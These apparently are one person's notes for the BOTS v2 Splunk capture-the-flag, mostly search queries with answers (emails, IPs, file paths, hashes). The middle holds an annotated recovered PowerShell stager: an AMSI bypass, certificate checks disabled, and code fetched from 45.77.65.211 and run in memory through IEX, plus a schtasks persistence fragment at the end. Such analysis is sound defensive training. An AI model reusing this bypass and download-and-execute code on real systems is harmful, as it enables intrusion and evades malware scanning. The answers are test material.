
v2

100 series questions

Count all events (by sourcetype)

| metadata type=sourcetypes index=botsv2

| eval firstTime=strftime(firstTime,"%Y-%m-%d %H:%M:%S")

| eval lastTime=strftime(lastTime,"%Y-%m-%d %H:%M:%S")

| eval recentTime=strftime(recentTime,"%Y-%m-%d %H:%M:%S")

| sort - totalCount

  • index="botsv2" amber

  • index="botsv2" sourcetype="pan:traffic"

  • index="botsv2" Amber src_user="frothly.local\amber.turing" | reverse

  • index="botsv2" 10.0.2.101 *beer* sourcetype="stream:HTTP" | dedup site | table _time site

  • index="botsv2" 10.0.2.101 sourcetype="stream:HTTP" www.berkbeer.com | table _time uri_path

  • index="botsv2" *berk* "method{}"=MAIL

    • index="botsv2" mberk@berkbeer.com

    • index="botsv2" aturing@froth.ly

    • index="botsv2" | search "Heinz Bernhard Contact Information"

      • ambersthebest@yeastiebeastie.com

        • Amber Turing

      • mberk@berkbeer.com

        • Martin Berk

      • aturing@froth.ly

        • Amber Turing

      • hbernhard@berkbeer.com

        • Heinz Bernhard

index="botsv2" | search "@berkbeer.com"

hint

200 series questions

  • index="botsv2" Amber TOR

  • index="botsv2" brewertalk.com

  • index="botsv2" brewertalk.com http_comment="HTTP/1.1 404 Not Found" | table _time src_ip src_header uri_path http_method | stats count by src_ip

    • 45.77.65.211

  • index="botsv2" 52.42.208.228 | stats count by uri_path

  • index="botsv2" 52.42.208.228 | dedup form_data | table form_data

    • kIagerfield

  • index="botsv2" member.php SQL | stats count by form_data

  • index="botsv2" kevin | dedup cookie | table cookie src_ip dest_ip

  • index="botsv2" Mallory .pptx | dedup filename | table _time filename

  • index="botsv2" host="MACLORY-AIR13" .pptx

    • /Volumes//FROTHLY/Home/mallory.kraeusen/Frothly_marketing_campaign_Q317.pptx

    • /Users/mallorykraeusen/Documents/

index="botsv2" mallory MACLORY-AIR13

  • index="botsv2" Mallory .crypt | dedup filename | table _time filename

  • index="botsv2" .mkv

  • index="botsv2" host="MACLORY-AIR13" ".crypt" sourcetype=ps

  • index="botsv2" kutekitten | search vendor action=added

    • columns.vendor_id

    • Look up that vendor ID online

  • index="botsv2" kutekitten.local mkraeusen | dedup columns.md5 | table columns.name columns.path columns.value name columns.cmdline columns.md5

  • index="botsv2" befa9bfe488244c64db096522b4fad73fc01ea8c4cd0323f1cbdee81ba008271

    • /Users/mkraeusen/Downloads/Important_HR_INFO_for_mkraeusen

  • The last two answers are found here:

  • index=botsv2 *.zip

    • C:\Users\billy.tun\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\4RND1WK1\invoice.zip

    • 2017-08-24 03:27:29.947

  • index=botsv2 invoice.zip

    • Check the email content

  • index=botsv2 SSL app=ssl

    • ssl_issuer

  • index=botsv2 Frothly winsys32.dll

# Recovered PowerShell stager, reproduced as pasted (identifiers are case-randomised).
# Read top-down as a defender it does five things: (1) disables AMSI scanning via
# reflection, (2) builds a WebClient that accepts any TLS certificate and rides the
# system proxy with the user's default credentials, (3) fetches a blob from a
# hard-coded URL, (4) RC4-decrypts it with a staging key, and (5) hands the result
# to Invoke-Expression. The destination 45.77.65.211 is the same address identified
# earlier on this page as the source of the brewertalk.com 404 scanning.
# NOTE(review): several operators appear space-split by the page formatting
# (`NEW - ObjECt`, ` - BxOR`, ` - JoIN`); treat this listing as evidence to read,
# not as text that runs as-is.
#
# Step 1 - locate the AmsiUtils type via reflection on the [Ref] assembly.
[Ref].AsSEmbLY.GetTYPE('System.Management.Automation.AmsiUtils')|? {
    $_
}

# Set the private static field amsiInitFailed to $true. This is the widely
# documented AMSI bypass: PowerShell then treats AMSI as unavailable, so later
# script content is not submitted for scanning.
|% {
    $_.GeTFIeLd('amsiInitFailed', 'NonPublic,Static').SEtVaLUE($nULl, $TRuE)
};
# Step 2 - HTTP client setup.
# Disable the Expect: 100-continue handshake on outgoing requests.
[SYstem.NEt.SERvICEPOInTMAnagER]::EXPEct100ContiNue = 0;
$wC = NEW - ObjECt SYsTeM.NeT.WEbCliEnt;
# Hard-coded browser-like User-Agent; combined with the host and URI path below
# it is a useful pivot in proxy or stream:http data.
$u = 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
# The certificate validation callback always returns $true, so any TLS
# certificate presented by the remote host (self-signed included) is accepted.
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {
    $true
};
$wc.HeAdeRS.AdD('User-Agent', $u);
# Use the system default proxy with the current user's network credentials, so
# the request traverses the corporate proxy like ordinary browser traffic.
$WC.Proxy = [SySTEm.Net.WeBREQUeSt]::DEfAulTWeBProxY;
$Wc.PROxy.CReDeNtIalS = [SystEm.NEt.CrEdEntiaLCacHe]::DeFAuLtNetWORkCREDeNtIAls;
# Step 3 - staging key: the ASCII bytes of this 32-character string.
$K = [SystEm.Text.EncODIng]::ASCII.GeTByTeS('389288edd78e8ea2f54946d3209b16b8');
# $R is an RC4 routine taking ($data, $key) as positional arguments and
# emitting the XORed bytes one at a time.
$R = {
    $D, $K = $ARgs;
    # Key-scheduling: initialise S to 0..255 and permute it using the key bytes
    # (key index wraps with $_ % $K.Count).
    $S = 0..255;
    0..255|% {
        $J = ($J + $S[$_] + $K[$_%$K.CouNt])%256;
        $S[$_], $S[$J] = $S[$J], $S[$_]
    };
    # Keystream generation: for each input byte advance $I and $H, swap the two
    # S entries, and XOR the byte with S[(S[I] + S[H]) mod 256].
    $D|% {
        $I = ($I + 1)%256;
        $H = ($H + $S[$I])%256;
        $S[$I], $S[$H] = $S[$H], $S[$I];
        $_ - BxOR$S[($S[$I] + $S[$H])%256]
    }

};
# Step 4 - C2 request. The fixed session cookie, the User-Agent above, the host
# and the URI path are the indicators to hunt for.
$wc.HeadERs.ADd("Cookie", "session=lrtRHKkA6IL5h/d8Ekk6QsxyPvk=");
$ser = 'https://45.77.65.211:443';
$t = '/admin/get.php';
$DATA = $WC.DoWNLoaDDATA($SER + $T);
# The first 4 bytes of the response are the IV; the remainder is ciphertext.
$iV = $DAta[0..3];
$DatA = $dATa[4..$DaTa.lENGTh];
# Step 5 - decrypt with key (IV + K), join the bytes as characters, and execute
# the result with Invoke-Expression. Nothing in the visible code writes a file,
# so the next stage exists only in memory - look for it in script block logging.
 - JoIN[CHar[]](& $R $daTa ($IV + $K))|IEX
  • index="botsv2" winsys32.dll

    • Shows which program was used

  • index="botsv2" sourcetype="stream:ftp"

    • Shows the activity of that program

  • index="botsv2" sourcetype="stream:ftp" method=RETR | dedup filename | table filename

    • Exposes the filename

index="botsv2" schtasks.exe

"C:\Windows\system32\schtasks.exe" /Create /F /RU system /SC DAILY /ST

HKLM:\Software\Microsoft\Network debug
